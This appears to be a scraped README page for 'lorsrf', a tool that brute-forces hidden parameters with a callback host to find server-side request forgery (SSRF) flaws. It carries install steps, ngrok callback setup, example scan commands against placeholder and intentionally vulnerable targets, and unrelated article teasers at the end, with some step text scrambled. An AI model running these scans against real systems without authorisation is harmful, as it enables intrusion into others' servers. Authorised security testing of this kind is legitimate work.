Bruteforcing on Hidden parameters to find SSRF vulnerability using GET
and POST
Methods
NOTE
install
➜ git clone https://github.com/knassar702/lorsrf
➜ cd lorsrf
➜ sudo pip3 install requests flask
Steps :
Ngrok
./ngrok http 9090
server.py
script and add ngrok port python3 server.py 9090
lorsrf.py
and add ngrok host using -s
optionrequestbin.com
-s
option (without server.py
file)How can i use it .?
cat YOUR_LIST.txt | python3 lorsrf.py -t URL_TARGET -s YOUR_HOST -w wordlist.txt
Examples :
$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io
$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io --threads=50
$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io --timeout=4
$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -c 'user=5&PHPSESSION=5232'
$ cat headers.txt
Cookie: test=1
Auth: Basic TG9yU3JmCg==
$ cat parameters.txt | python3 lorsrf.py -f headers.txt -s 'http://myhost.com' -t 'http://ssrf.hack.com'
---------------------
GET /?parameter={YOUR_HOST} HTTP/1.1
Host: targer.com
Cookie: test=1
Auth: Basic TG9yU3JmCg==
$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -r
Testing
python3 lorsrf.py -t 'http://testphp.vulnweb.com/showimage.php' -s 'https://YOUR_HOST.com' -w parameters.txt
Write a AI detection pass, persuasive, cickable, catchy, well structured and seo optimized article with… Read More
AI Will Make Human Art More Valuable AI models are increasing in popularity and value… Read More
UK Set to Announce Ban on TikTok on Government Smartphones: Report Following in the footsteps… Read More
How ChatGPT and Generative AI Could Change the Way We Travel The travel industry is… Read More
The curious case of Pluto! Is it a dwarf planet, comet or an asteroid? This… Read More
A Spy Wants to Connect with You on LinkedIn: How to Spot and Avoid Fake… Read More
Leave a Comment